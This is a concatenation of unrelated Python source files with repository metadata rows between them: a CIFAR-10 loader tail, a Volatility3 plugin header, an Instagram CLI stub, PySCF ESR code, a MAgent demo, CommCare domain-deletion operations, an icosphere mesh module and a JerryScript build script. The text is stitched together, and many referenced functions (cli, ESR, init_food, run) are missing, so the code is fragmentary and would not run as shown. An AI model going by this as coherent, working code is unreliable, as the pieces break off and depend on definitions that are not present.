Return train_data, train_filenames, train_labels, test_data, test_filenames, test_labels
"""
# get the meta_data_dict
# num_cases_per_batch: 1000
# label_names: ['airplane', 'automobile', 'bird', 'cat', 'deer', 'dog', 'frog', 'horse', 'ship', 'truck']
# num_vis: :3072
meta_data_dict = unpickle(data_dir + "/batches.meta")
cifar_label_names = meta_data_dict[b'label_names']
cifar_label_names = np.array(cifar_label_names)
# training data
cifar_train_data = None
cifar_train_filenames = []
cifar_train_labels = []
# cifar_train_data_dict
# 'batch_label': 'training batch 5 of 5'
# 'data': ndarray
# 'filenames': list
# 'labels': list
for i in range(1, 6):
cifar_train_data_dict = unpickle(data_dir + "/data_batch_{}".format(i))
if i == 1:
cifar_train_data = cifar_train_data_dict[b'data']
else:
cifar_train_data = np.vstack((cifar_train_data, cifar_train_data_dict[b'data']))
cifar_train_filenames += cifar_train_data_dict[b'filenames']
cifar_train_labels += cifar_train_data_dict[b'labels']
cifar_train_data = cifar_train_data.reshape((len(cifar_train_data), 3, 32, 32))
if negatives:
cifar_train_data = cifar_train_data.transpose(0, 2, 3, 1).astype(np.float32)
else:
cifar_train_data = np.rollaxis(cifar_train_data, 1, 4)
cifar_train_filenames = np.array(cifar_train_filenames)
cifar_train_labels = np.array(cifar_train_labels)
# test data
# cifar_test_data_dict
# 'batch_label': 'testing batch 1 of 1'
# 'data': ndarray
# 'filenames': list
# 'labels': list
cifar_test_data_dict = unpickle(data_dir + "/test_batch")
cifar_test_data = cifar_test_data_dict[b'data']
cifar_test_filenames = cifar_test_data_dict[b'filenames']
cifar_test_labels = cifar_test_data_dict[b'labels']
cifar_test_data = cifar_test_data.reshape((len(cifar_test_data), 3, 32, 32))
if negatives:
cifar_test_data = cifar_test_data.transpose(0, 2, 3, 1).astype(np.float32)
else:
cifar_test_data = np.rollaxis(cifar_test_data, 1, 4)
cifar_test_filenames = np.array(cifar_test_filenames)
cifar_test_labels = np.array(cifar_test_labels)
return cifar_train_data, cifar_train_filenames, cifar_train_labels, \
cifar_test_data, cifar_test_filenames, cifar_test_labels, cifar_label_names
if __name__ == "__main__":
"""show it works"""
cifar_10_dir = '.\cifar10-dataset'
train_data, train_filenames, train_labels, test_data, test_filenames, test_labels, label_names = \
load_cifar_10_data(cifar_10_dir)
print("Train data: ", train_data.shape)
print("Train filenames: ", train_filenames.shape)
print("Train labels: ", train_labels.shape)
print("Test data: ", test_data.shape)
print("Test filenames: ", test_filenames.shape)
print("Test labels: ", test_labels.shape)
print("Label names: ", label_names.shape)
# Don't forget that the label_names and filesnames are in binary and need conversion if used.
# display some random training images in a 25x25 grid
num_plot = 5
f, ax = plt.subplots(num_plot, num_plot)
for m in range(num_plot):
for n in range(num_plot):
idx = np.random.randint(0, train_data.shape[0])
ax[m, n].imshow(train_data[idx])
ax[m, n].get_xaxis().set_visible(False)
ax[m, n].get_yaxis().set_visible(False)
f.subplots_adjust(hspace=0.1)
f.subplots_adjust(wspace=0)
plt.show()
| 36.808333 | 118 | 0.699796 |
fe5d25adf1fa45402acfda5811c79b3110e5df76 | 3,054 | py | Python | volatility3/framework/plugins/mac/lsmod.py | leohearts/volatility3 | f52bd8d74fc47e63ea2611d0171b63dc589d4fdf | [
"Linux-OpenIB"
] | null | null | null | volatility3/framework/plugins/mac/lsmod.py | leohearts/volatility3 | f52bd8d74fc47e63ea2611d0171b63dc589d4fdf | [
"Linux-OpenIB"
] | null | null | null | volatility3/framework/plugins/mac/lsmod.py | leohearts/volatility3 | f52bd8d74fc47e63ea2611d0171b63dc589d4fdf | [
"Linux-OpenIB"
] | null | null | null | # This file is Copyright 2019 Volatility Foundation and licensed under the Volatility Software License 1.0
# which is available at https://www.volatilityfoundation.org/license/vsl-v1.0
#
"""A module containing a collection of plugins that produce data typically
found in Mac's lsmod command."""
from volatility3.framework import renderers, interfaces, contexts
from volatility3.framework.configuration import requirements
from volatility3.framework.interfaces import plugins
from volatility3.framework.objects import utility
from volatility3.framework.renderers import format_hints
| 34.704545 | 114 | 0.630321 |
fe5e44d3d94cf663368e7d42480218daf9100e40 | 16,722 | py | Python | instahunter.py | Araekiel/instahunter | c07c10773bcf33bdc0d46b39a0dda3f55936b1f3 | [
"MIT"
] | 17 | 2020-09-06T18:10:51.000Z | 2021-12-04T07:04:00.000Z | instahunter.py | Araekiel/instahunter | c07c10773bcf33bdc0d46b39a0dda3f55936b1f3 | [
"MIT"
] | 1 | 2020-09-30T18:43:10.000Z | 2021-05-17T09:59:03.000Z | instahunter.py | Araekiel/instahunter | c07c10773bcf33bdc0d46b39a0dda3f55936b1f3 | [
"MIT"
] | 5 | 2020-11-10T15:08:37.000Z | 2022-01-02T21:20:24.000Z | '''
instahunter.py
Author: Araekiel
Copyright: Copyright 2019, Araekiel
License: MIT
Version: 1.6.3
'''
import click
import requests
import json
from datetime import datetime
headers = { "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0"}
cli.add_command(getposts)
cli.add_command(getuser)
cli.add_command(getuserposts)
cli.add_command(search)
if __name__ == "__main__":
cli()
| 59.297872 | 425 | 0.57224 |
fe5f1c04bf52b3ba6d57139fe21bba52f39a4f4c | 6,901 | py | Python | pyscf/prop/esr/uks.py | azag0/pyscf | 1e3e27b61b3cfd22c9679d2c9851c13b3ebc5a1b | [
"Apache-2.0"
] | 2 | 2021-08-03T12:32:25.000Z | 2021-09-29T08:19:02.000Z | pyscf/prop/esr/uks.py | azag0/pyscf | 1e3e27b61b3cfd22c9679d2c9851c13b3ebc5a1b | [
"Apache-2.0"
] | null | null | null | pyscf/prop/esr/uks.py | azag0/pyscf | 1e3e27b61b3cfd22c9679d2c9851c13b3ebc5a1b | [
"Apache-2.0"
] | 2 | 2020-06-01T05:31:38.000Z | 2022-02-08T02:38:33.000Z | #!/usr/bin/env python
# Copyright 2014-2019 The PySCF Developers. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Author: Qiming Sun <osirpt.sun@gmail.com>
#
'''
Non-relativistic unrestricted Kohn-Sham electron spin-rotation coupling
(In testing)
Refs:
J. Phys. Chem. A. 114, 9246, 2010
Mole. Phys. 9, 6, 585, 1964
'''
from functools import reduce
import numpy, sys
from pyscf import lib
from pyscf.lib import logger
from pyscf.dft import numint
from pyscf.prop.nmr import uks as uks_nmr
from pyscf.prop.esr import uhf as uhf_esr
from pyscf.prop.esr.uhf import _write, align
from pyscf.data import nist
from pyscf.grad import rks as rks_grad
# Note mo10 is the imaginary part of MO^1
# Treat Vxc as one-particle operator Vnuc
# Jia, start to work here
if __name__ == '__main__':
    # Smoke/regression tests for the ESR machinery defined earlier in this
    # module (ESR, GTensor, para, make_para_soc2e are not visible here).
    from pyscf import gto, scf
    # Case 1: H2^- doublet — run the full ESR kernel with a fixed gauge origin.
    mol = gto.M(atom='H 0 0.1 0; H 0 0 1.',
                basis='ccpvdz', spin=1, charge=-1, verbose=3)
    mf = scf.UKS(mol).set(xc='bp86').run()
    esr_obj = ESR(mf)
    esr_obj.gauge_orig = (0,0,0)
    esr_obj.para_soc2e = False
    esr_obj.so_eff_charge = True
    print(esr_obj.kernel())
    # Case 2: H4^+ doublet — exercise GTensor with 'SSO' two-electron SOC.
    mol = gto.M(atom='''
                H 0 0 1
                H 1.2 0 1
                H .1 1.1 0.3
                H .8 .7 .6
                ''',
                basis='ccpvdz', spin=1, charge=1, verbose=3)
    mf = scf.UKS(mol).set(xc='bp86').run()
    gobj = GTensor(mf)
    #print(gobj.kernel())
    gobj.para_soc2e = 'SSO'
    gobj.dia_soc2e = None
    gobj.so_eff_charge = False
    nao, nmo = mf.mo_coeff[0].shape
    nelec = mol.nelec
    # Regression checks against hard-coded reference fingerprints: with the
    # seeded pseudo-random inputs the printed differences should be ~0.
    numpy.random.seed(1)
    mo10 =[numpy.random.random((3,nmo,nelec[0])),
           numpy.random.random((3,nmo,nelec[1]))]
    print(lib.finger(para(gobj, mo10, mf.mo_coeff, mf.mo_occ)) - -2.1813250579863279e-05)
    numpy.random.seed(1)
    dm0 = numpy.random.random((2,nao,nao))
    dm0 = dm0 + dm0.transpose(0,2,1)
    dm10 = numpy.random.random((2,3,nao,nao))
    dm10 = dm10 - dm10.transpose(0,1,3,2)
    print(lib.finger(make_para_soc2e(gobj, dm0, dm10)) - 0.0036073897889263721)
| 36.707447 | 89 | 0.613534 |
fe5f635d76dff706767d5a4351544f241f8b385b | 3,192 | py | Python | examples/gather_demo.py | mununum/MAgent | 7272cd726182280444597310d52369fac5e13e37 | [
"MIT"
] | 1 | 2021-06-22T10:22:26.000Z | 2021-06-22T10:22:26.000Z | examples/gather_demo.py | mununum/MAgent | 7272cd726182280444597310d52369fac5e13e37 | [
"MIT"
] | null | null | null | examples/gather_demo.py | mununum/MAgent | 7272cd726182280444597310d52369fac5e13e37 | [
"MIT"
] | null | null | null | import random
import magent
from magent.builtin.rule_model import RandomActor
import numpy as np
if __name__ == "__main__":
    # Python 2 demo script (note the statement-form prints below): random
    # agents gather food on a small grid world and the total reward is summed.
    # NOTE(review): init_food and neigbor_regen_food are defined elsewhere in
    # this file (not visible in this chunk).
    gw = magent.gridworld
    cfg = gw.Config()
    map_size = 25
    cfg.set({"map_width": map_size, "map_height": map_size})
    # One group of gatherer agents...
    agent_group = cfg.add_group(
        cfg.register_agent_type(
            name="agent",
            attr={
                'width': 1,
                'length': 1,
                'view_range': gw.CircleRange(4),
                'can_gather': True}))
    # ...and one group of stationary food items.
    food_group = cfg.add_group(
        cfg.register_agent_type(
            "food",
            attr={'width': 1,
                  'length': 1,
                  'can_be_gathered': True}))
    # add reward rule: +1 to an agent whenever it collides with a food item
    a = gw.AgentSymbol(agent_group, index='any')
    b = gw.AgentSymbol(food_group, index='any')
    e = gw.Event(a, 'collide', b)
    cfg.add_reward_rule(e, receiver=a, value=1)
    # cfg.add_reward_rule(e2, receiver=b, value=1, die=True)
    # cfg.add_reward_rule(e3, receiver=[a,b], value=[-1,-1])
    env = magent.GridWorld(cfg)
    agent_handle, food_handle = env.get_handles()
    # Baseline policy: every agent acts randomly (biased "up").
    model1 = RandomActor(env, agent_handle, "up")
    env.set_render_dir("build/render")
    env.reset()
    # Five agents in a cross pattern around the map centre.
    upstart = [(map_size//2 - 2, map_size//2 - 2), (map_size//2 + 2, map_size//2 - 2),
               (map_size//2, map_size//2), (map_size//2 - 2, map_size//2 + 2),
               (map_size//2 + 2, map_size//2 + 2)]
    # spawnrate = 0.1
    env.add_agents(agent_handle, method="custom", pos=upstart)
    # env.add_agents(rightgroup, method="custom", pos=rightstart)
    init_food(env, food_handle)
    k = env.get_observation(agent_handle)
    print env.get_pos(agent_handle)
    print len(env.get_pos(food_handle))
    # Main simulation loop: capped at ~250 steps or until the env reports done.
    done = False
    step_ct = 0
    r_sum = 0
    while not done:
        obs_1 = env.get_observation(agent_handle)
        ids_1 = env.get_agent_id(agent_handle)
        acts_1 = model1.infer_action(obs_1, ids_1)
        env.set_action(agent_handle, acts_1)
        # simulate one step
        done = env.step()
        # render
        env.render()
        # get reward
        reward = sum(env.get_reward(agent_handle))
        r_sum += reward
        # clear dead agents
        env.clear_dead()
        neigbor_regen_food(env, food_handle)
        # print info
        # if step_ct % 10 == 0:
        #     print("step %d" % step_ct)
        step_ct += 1
        if step_ct > 250:
            break
    print r_sum
fe605cdea9d8787846418bf36b3fc74d17111206 | 11,661 | py | Python | corehq/apps/domain/deletion.py | shyamkumarlchauhan/commcare-hq | 99df931bcf56e9fbe15d8fcb0dc98b5a3957fb48 | [
"BSD-3-Clause"
] | null | null | null | corehq/apps/domain/deletion.py | shyamkumarlchauhan/commcare-hq | 99df931bcf56e9fbe15d8fcb0dc98b5a3957fb48 | [
"BSD-3-Clause"
] | null | null | null | corehq/apps/domain/deletion.py | shyamkumarlchauhan/commcare-hq | 99df931bcf56e9fbe15d8fcb0dc98b5a3957fb48 | [
"BSD-3-Clause"
] | null | null | null | import itertools
import logging
from datetime import date
from django.apps import apps
from django.conf import settings
from django.db import connection, transaction
from django.db.models import Q
from dimagi.utils.chunked import chunked
from corehq.apps.accounting.models import Subscription
from corehq.apps.accounting.utils import get_change_status
from corehq.apps.custom_data_fields.dbaccessors import get_by_domain_and_type
from corehq.apps.domain.utils import silence_during_tests
from corehq.apps.locations.views import LocationFieldsView
from corehq.apps.products.views import ProductFieldsView
from corehq.apps.userreports.dbaccessors import (
delete_all_ucr_tables_for_domain,
)
from corehq.apps.users.views.mobile import UserFieldsView
from corehq.blobs import CODES, get_blob_db
from corehq.blobs.models import BlobMeta
from corehq.form_processor.backends.sql.dbaccessors import doc_type_to_state
from corehq.form_processor.interfaces.dbaccessors import (
CaseAccessors,
FormAccessors,
)
from corehq.util.log import with_progress_bar
logger = logging.getLogger(__name__)
def _delete_domain_backend_mappings(domain_name):
    """Drop every non-global SMS backend mapping tied to *domain_name*."""
    mapping_cls = apps.get_model('sms', 'SQLMobileBackendMapping')
    mapping_cls.objects.filter(domain=domain_name, is_global=False).delete()
def _delete_domain_backends(domain_name):
    """Drop every non-global SMS backend tied to *domain_name*."""
    backend_cls = apps.get_model('sms', 'SQLMobileBackend')
    backend_cls.objects.filter(domain=domain_name, is_global=False).delete()
def _delete_web_user_membership(domain_name):
    """Remove *domain_name* membership from every web user (active or not).

    Under UNIT_TESTING, a user left with no remaining memberships is deleted
    outright; otherwise the user document is saved without the membership.
    """
    from corehq.apps.users.models import WebUser
    active_web_users = WebUser.by_domain(domain_name)
    inactive_web_users = WebUser.by_domain(domain_name, is_active=False)
    for web_user in list(active_web_users) + list(inactive_web_users):
        web_user.delete_domain_membership(domain_name)
        if settings.UNIT_TESTING and not web_user.domain_memberships:
            web_user.delete()
        else:
            web_user.save()
# We use raw queries instead of ORM because Django queryset delete needs to
# fetch objects into memory to send signals and handle cascades. It makes deletion very slow
# if we have a millions of rows in stock data tables.
DOMAIN_DELETE_OPERATIONS = [
RawDeletion('stock', """
DELETE FROM stock_stocktransaction
WHERE report_id IN (SELECT id FROM stock_stockreport WHERE domain=%s)
"""),
RawDeletion('stock', "DELETE FROM stock_stockreport WHERE domain=%s"),
RawDeletion('stock', """
DELETE FROM commtrack_stockstate
WHERE product_id IN (SELECT product_id FROM products_sqlproduct WHERE domain=%s)
"""),
ModelDeletion('products', 'SQLProduct', 'domain'),
ModelDeletion('locations', 'SQLLocation', 'domain'),
ModelDeletion('locations', 'LocationType', 'domain'),
ModelDeletion('stock', 'DocDomainMapping', 'domain_name'),
ModelDeletion('domain_migration_flags', 'DomainMigrationProgress', 'domain'),
ModelDeletion('sms', 'DailyOutboundSMSLimitReached', 'domain'),
ModelDeletion('sms', 'SMS', 'domain'),
ModelDeletion('sms', 'SQLLastReadMessage', 'domain'),
ModelDeletion('sms', 'ExpectedCallback', 'domain'),
ModelDeletion('ivr', 'Call', 'domain'),
ModelDeletion('sms', 'Keyword', 'domain'),
ModelDeletion('sms', 'PhoneNumber', 'domain'),
ModelDeletion('sms', 'MessagingSubEvent', 'parent__domain'),
ModelDeletion('sms', 'MessagingEvent', 'domain'),
ModelDeletion('sms', 'QueuedSMS', 'domain'),
ModelDeletion('sms', 'SelfRegistrationInvitation', 'domain'),
CustomDeletion('sms', _delete_domain_backend_mappings),
ModelDeletion('sms', 'MobileBackendInvitation', 'domain'),
CustomDeletion('sms', _delete_domain_backends),
CustomDeletion('users', _delete_web_user_membership),
CustomDeletion('accounting', _terminate_subscriptions),
CustomDeletion('form_processor', _delete_all_cases),
CustomDeletion('form_processor', _delete_all_forms),
ModelDeletion('aggregate_ucrs', 'AggregateTableDefinition', 'domain'),
ModelDeletion('app_manager', 'AppReleaseByLocation', 'domain'),
ModelDeletion('app_manager', 'LatestEnabledBuildProfiles', 'domain'),
ModelDeletion('app_manager', 'ResourceOverride', 'domain'),
ModelDeletion('app_manager', 'GlobalAppConfig', 'domain'),
ModelDeletion('case_importer', 'CaseUploadRecord', 'domain'),
ModelDeletion('case_search', 'CaseSearchConfig', 'domain'),
ModelDeletion('case_search', 'CaseSearchQueryAddition', 'domain'),
ModelDeletion('case_search', 'FuzzyProperties', 'domain'),
ModelDeletion('case_search', 'IgnorePatterns', 'domain'),
ModelDeletion('cloudcare', 'ApplicationAccess', 'domain'),
ModelDeletion('consumption', 'DefaultConsumption', 'domain'),
ModelDeletion('data_analytics', 'GIRRow', 'domain_name'),
ModelDeletion('data_analytics', 'MALTRow', 'domain_name'),
ModelDeletion('data_dictionary', 'CaseType', 'domain'),
ModelDeletion('data_interfaces', 'CaseRuleAction', 'rule__domain'),
ModelDeletion('data_interfaces', 'CaseRuleCriteria', 'rule__domain'),
ModelDeletion('data_interfaces', 'CaseRuleSubmission', 'rule__domain'),
ModelDeletion('data_interfaces', 'CaseRuleSubmission', 'domain'), # TODO
ModelDeletion('data_interfaces', 'AutomaticUpdateRule', 'domain'),
ModelDeletion('data_interfaces', 'DomainCaseRuleRun', 'domain'),
ModelDeletion('domain', 'TransferDomainRequest', 'domain'),
ModelDeletion('export', 'EmailExportWhenDoneRequest', 'domain'),
CustomDeletion('export', _delete_data_files),
ModelDeletion('locations', 'LocationFixtureConfiguration', 'domain'),
ModelDeletion('ota', 'MobileRecoveryMeasure', 'domain'),
ModelDeletion('ota', 'SerialIdBucket', 'domain'),
ModelDeletion('phone', 'OwnershipCleanlinessFlag', 'domain'),
ModelDeletion('phone', 'SyncLogSQL', 'domain'),
ModelDeletion('registration', 'RegistrationRequest', 'domain'),
ModelDeletion('reminders', 'EmailUsage', 'domain'),
ModelDeletion('reports', 'ReportsSidebarOrdering', 'domain'),
ModelDeletion('smsforms', 'SQLXFormsSession', 'domain'),
ModelDeletion('translations', 'SMSTranslations', 'domain'),
ModelDeletion('translations', 'TransifexBlacklist', 'domain'),
ModelDeletion('userreports', 'AsyncIndicator', 'domain'),
ModelDeletion('users', 'DomainRequest', 'domain'),
ModelDeletion('users', 'Invitation', 'domain'),
ModelDeletion('users', 'DomainPermissionsMirror', 'source'),
ModelDeletion('zapier', 'ZapierSubscription', 'domain'),
ModelDeletion('dhis2', 'Dhis2Connection', 'domain'),
ModelDeletion('motech', 'RequestLog', 'domain'),
ModelDeletion('couchforms', 'UnfinishedSubmissionStub', 'domain'),
CustomDeletion('custom_data_fields', _delete_custom_data_fields),
CustomDeletion('ucr', delete_all_ucr_tables_for_domain),
]
| 41.646429 | 108 | 0.725924 |
fe609a5c6fba0b3499c6abf7b2ebbe251d3d8901 | 8,056 | py | Python | icosphere/icosphere.py | JackWalpole/icosahedron | 5317d8eb9509abe275beb2693730e3efaa986672 | [
"MIT"
] | 2 | 2017-10-02T23:36:49.000Z | 2021-12-21T06:12:16.000Z | icosphere/icosphere.py | JackWalpole/icosphere | 5317d8eb9509abe275beb2693730e3efaa986672 | [
"MIT"
] | null | null | null | icosphere/icosphere.py | JackWalpole/icosphere | 5317d8eb9509abe275beb2693730e3efaa986672 | [
"MIT"
] | null | null | null | """Subdivided icosahedral mesh generation"""
from __future__ import print_function
import numpy as np
# following: http://blog.andreaskahler.com/2009/06/creating-icosphere-mesh-in-code.html
# hierarchy:
# Icosphere -> Triangle -> Point
def calculate_npts(level):
    """Vertex count of an icosphere subdivided *level* times: 2 + 10 * 4**level."""
    edge_divisions = 2 ** level
    return 10 * edge_divisions ** 2 + 2
def calculate_nfaces(level):
    """Triangular-face count of an icosphere subdivided *level* times: 20 * 4**level."""
    return 20 * (2 ** level) * (2 ** level)
def cart2geo(x, y, z):
    """Convert cartesian x, y, z to (latitude, longitude, radius) in degrees.

    Right-handed frame: the x-axis pierces the equator at 0 degrees longitude,
    the y-axis at 90 degrees longitude, and the z-axis exits the north pole.
    Latitude and longitude are returned in degrees (np.rad2deg applied).
    """
    radius = np.sqrt(x ** 2 + y ** 2 + z ** 2)
    longitude = np.rad2deg(np.arctan2(y, x))
    latitude = np.rad2deg(np.arcsin(z / radius))
    return latitude, longitude, radius
def geo2cart(lat, lon, r):
    """Convert (latitude, longitude, radius) to cartesian x, y, z.

    Same right-handed frame as cart2geo: x through (0N, 0E), y through
    (0N, 90E), z through the north pole.

    NOTE(review): lat/lon are passed straight to np.sin/np.cos, which take
    radians — whereas cart2geo returns degrees. Confirm callers convert.
    """
    cos_lat = np.cos(lat)
    x = r * np.cos(lon) * cos_lat
    y = r * np.sin(lon) * cos_lat
    z = r * np.sin(lat)
    return x, y, z
# def xyzToLatLonR(xyz):
# trans = np.array([np.])
| 37.64486 | 96 | 0.544067 |
fe60c7c64b76bb62e7927a82cb0d30249ff0793b | 1,840 | py | Python | src/main.py | Lidenbrock-ed/challenge-prework-backend-python | d2f46a5cf9ad649de90d4194d115cd9492eb583d | [
"MIT"
] | null | null | null | src/main.py | Lidenbrock-ed/challenge-prework-backend-python | d2f46a5cf9ad649de90d4194d115cd9492eb583d | [
"MIT"
] | null | null | null | src/main.py | Lidenbrock-ed/challenge-prework-backend-python | d2f46a5cf9ad649de90d4194d115cd9492eb583d | [
"MIT"
] | null | null | null | # Resolve the problem!!
import string
import random
SYMBOLS = list('!"#$%&\'()*+,-./:;?@[]^_`{|}~')
if __name__ == '__main__':
run()
| 27.058824 | 119 | 0.547283 |
fe6109edbf02869c5f97fef83d0ae614ddf0da76 | 8,091 | py | Python | targets/baremetal-sdk/curie-bsp/setup.py | ideas-detoxes/jerryscript | 42523bd6e2b114755498c9f68fd78545f9b33476 | [
"Apache-2.0"
] | 4,324 | 2016-11-25T11:25:27.000Z | 2022-03-31T03:24:49.000Z | targets/baremetal-sdk/curie-bsp/setup.py | ideas-detoxes/jerryscript | 42523bd6e2b114755498c9f68fd78545f9b33476 | [
"Apache-2.0"
] | 2,099 | 2016-11-25T08:08:59.000Z | 2022-03-12T07:41:20.000Z | targets/baremetal-sdk/curie-bsp/setup.py | lygstate/jerryscript | 55acdf2048b390d0f56f12e64dbfb2559f0e70ad | [
"Apache-2.0"
] | 460 | 2016-11-25T07:16:10.000Z | 2022-03-24T14:05:29.000Z | #!/usr/bin/env python
# Copyright JS Foundation and other contributors, http://js.foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import fnmatch
import os
def build_soft_links(project_path, jerry_path):
    """ Creates soft links into the @project_path.

    Links 'arc', 'include' and 'quark' point at the curie-bsp jerry_app
    subdirectories of @jerry_path; 'quark/jerryscript' points at the
    JerryScript tree itself.  Existing links are left alone.
    """
    if not os.path.exists(project_path):
        os.makedirs(project_path)
    # Each entry: 'src' is joined onto jerry_path below; 'link_name' is
    # relative to project_path.
    links = [
        { # arc
            'src': os.path.join('targets', 'baremetal-sdk', 'curie-bsp', 'jerry_app', 'arc'),
            'link_name': 'arc'
        },
        { # include
            'src': os.path.join('targets', 'baremetal-sdk', 'curie-bsp', 'jerry_app', 'include'),
            'link_name': 'include'
        },
        { # quark
            'src': os.path.join('targets', 'baremetal-sdk', 'curie-bsp', 'jerry_app', 'quark'),
            'link_name': 'quark'
        },
        { # quark/jerryscript
            # NOTE(review): joining jerry_path onto itself below yields
            # jerry_path again when it is absolute — confirm that is intended.
            'src': jerry_path,
            'link_name': os.path.join('quark', 'jerryscript')
        }
    ]
    for link in links:
        src = os.path.join(jerry_path, link['src'])
        link_name = os.path.join(project_path, link['link_name'])
        if not os.path.islink(link_name):
            os.symlink(src, link_name)
            print("Created symlink '{link_name}' -> '{src}'".format(src=src, link_name=link_name))
def find_sources(root_dir, sub_dir):
    """
    Collect every C (*.c) and assembly (*.S) file under @root_dir/@sub_dir.
    Returned paths are relative to @root_dir.
    """
    search_root = os.path.join(root_dir, sub_dir)
    found = []
    for current_dir, _subdirs, file_names in os.walk(search_root):
        # NOTE: fnmatch's '[c|S]' is a character class, so a literal '|'
        # extension would also match — pattern kept exactly as before.
        for name in fnmatch.filter(file_names, '*.[c|S]'):
            absolute_path = os.path.join(current_dir, name)
            found.append(os.path.relpath(absolute_path, root_dir))
    return found
def build_jerry_data(jerry_path):
    """
    Build up a dictionary which contains the following items:
    - sources: list of JerryScript sources which should be built, each
      prefixed with 'jerryscript' (the quark/jerryscript symlink name).
    - dirs: set of directories containing those sources.
    - cflags: CFLAGS (JerryScript feature defines) for the build.
    """
    jerry_sources = []
    jerry_dirs = set()
    # Scan the engine core, the math library and the curie-bsp glue code.
    for sub_dir in ['jerry-core', 'jerry-math', os.path.join('targets', 'baremetal-sdk', 'curie-bsp', 'source')]:
        for file in find_sources(os.path.normpath(jerry_path), sub_dir):
            path = os.path.join('jerryscript', file)
            jerry_sources.append(path)
            jerry_dirs.add(os.path.split(path)[0])
    # Minimal engine configuration: 10 KB heap, most builtins disabled.
    jerry_cflags = [
        '-DJERRY_GLOBAL_HEAP_SIZE=10',
        '-DJERRY_NDEBUG',
        '-DJERRY_DISABLE_HEAVY_DEBUG',
        '-DJERRY_BUILTIN_NUMBER=0',
        '-DJERRY_BUILTIN_STRING=0',
        '-DJERRY_BUILTIN_BOOLEAN=0',
        #'-DJERRY_BUILTIN_ERRORS=0',
        '-DJERRY_BUILTIN_ARRAY=0',
        '-DJERRY_BUILTIN_MATH=0',
        '-DJERRY_BUILTIN_JSON=0',
        '-DJERRY_BUILTIN_DATE=0',
        '-DJERRY_BUILTIN_REGEXP=0',
        '-DJERRY_BUILTIN_ANNEXB=0',
        '-DJERRY_ESNEXT=0',
        '-DJERRY_LCACHE=0',
        '-DJERRY_PROPERTY_HASHMAP=0',
    ]
    return {
        'sources': jerry_sources,
        'dirs': jerry_dirs,
        'cflags': jerry_cflags,
    }
def write_file(path, content):
    """Write *content* to the file at *path* (the path is normalized first)."""
    target = os.path.normpath(path)
    with open(target, "w+") as out:
        out.write(content)
    print("Wrote file '{0}'".format(target))
def build_obj_y(source_list):
    """
    Render Kbuild 'obj-y += <name>.o' lines from the @source_list.
    Note: the input sources should have their file extensions.
    """
    lines = []
    for fname in source_list:
        base, _ext = os.path.splitext(fname)
        lines.append('obj-y += {0}.o'.format(base))
    return '\n'.join(lines)
def build_cflags_y(cflags_list):
    """Render Kbuild 'cflags-y += <flag>' lines from the @cflags_list."""
    return '\n'.join('cflags-y += {0}'.format(flag) for flag in cflags_list)
def build_mkdir(dir_list):
    """Render tab-indented Makefile 'mkdir -p' recipe lines for @dir_list."""
    recipe = '\t$(AT)mkdir -p {0}'
    return '\n'.join(recipe.format(os.path.join('$(OUT_SRC)', d)) for d in dir_list)
def create_root_kbuild(project_path):
    """ Creates @project_path/Kbuild.mk file.

    The generated file simply descends into the arc/ and quark/
    subdirectories depending on the active Curie BSP core config.
    """
    root_kbuild_path = os.path.join(project_path, 'Kbuild.mk')
    root_kbuild_content = '''
obj-$(CONFIG_QUARK_SE_ARC) += arc/
obj-$(CONFIG_QUARK_SE_QUARK) += quark/
'''
    write_file(root_kbuild_path, root_kbuild_content)
def create_root_makefile(project_path):
    """ Creates @project_path/Makefile file.

    NOTE(review): the template references the module-level global
    'project_name', which is only assigned inside the __main__ block —
    calling this function standalone raises NameError.
    """
    root_makefile_path = os.path.join(project_path, 'Makefile')
    root_makefile_content = '''
THIS_DIR := $(shell dirname $(abspath $(lastword $(MAKEFILE_LIST))))
T := $(abspath $(THIS_DIR)/../..)
PROJECT := {project_name}
BOARD := curie_101
ifeq ($(filter curie_101, $(BOARD)),)
$(error The curie jerry sample application can only run on the curie_101 Board)
endif
BUILDVARIANT ?= debug
quark_DEFCONFIG = $(PROJECT_PATH)/quark/defconfig
arc_DEFCONFIG = $(PROJECT_PATH)/arc/defconfig
# Optional: set the default version
VERSION_MAJOR := 1
VERSION_MINOR := 0
VERSION_PATCH := 0
include $(T)/build/project.mk
'''.format(project_name=project_name)
    write_file(root_makefile_path, root_makefile_content)
def create_arc_kbuild(project_path):
    """ Creates @project_path/arc/Kbuild.mk file.

    Lists every .c/.S file found under the arc/ directory as an obj-y entry.
    """
    arc_path = os.path.join(project_path, 'arc')
    arc_kbuild_path = os.path.join(arc_path, 'Kbuild.mk')
    arc_sources = find_sources(arc_path, '.')
    arc_kbuild_content = build_obj_y(arc_sources)
    write_file(arc_kbuild_path, arc_kbuild_content)
def create_quark_kbuild(project_path, jerry_path):
    """ Creates @project_path/quark/Kbuild.mk file.

    The generated Kbuild compiles main.o plus every JerryScript source
    (with the engine feature defines and include paths from
    build_jerry_data), and adds a build_dirs target that mkdir's each
    output directory before sources are built.
    """
    quark_kbuild_path = os.path.join(project_path, 'quark', 'Kbuild.mk')
    # Extract a few JerryScript related data
    jerry_data = build_jerry_data(jerry_path)
    jerry_objects = build_obj_y(jerry_data['sources'])
    jerry_defines = jerry_data['cflags']
    jerry_build_dirs = build_mkdir(jerry_data['dirs'])
    # Include paths are made absolute under <project>/quark/ below.
    quark_include_paths = [
        'include',
        'jerryscript',
        os.path.join('jerryscript', 'jerry-math', 'include'),
        os.path.join('jerryscript', 'targets', 'baremetal-sdk', 'curie-bsp', 'include')
    ] + list(jerry_data['dirs'])
    quark_includes = [
        '-Wno-error',
    ] + ['-I%s' % os.path.join(project_path, 'quark', path) for path in quark_include_paths]
    quark_cflags = build_cflags_y(jerry_defines + quark_includes)
    quark_kbuild_content = '''
{cflags}
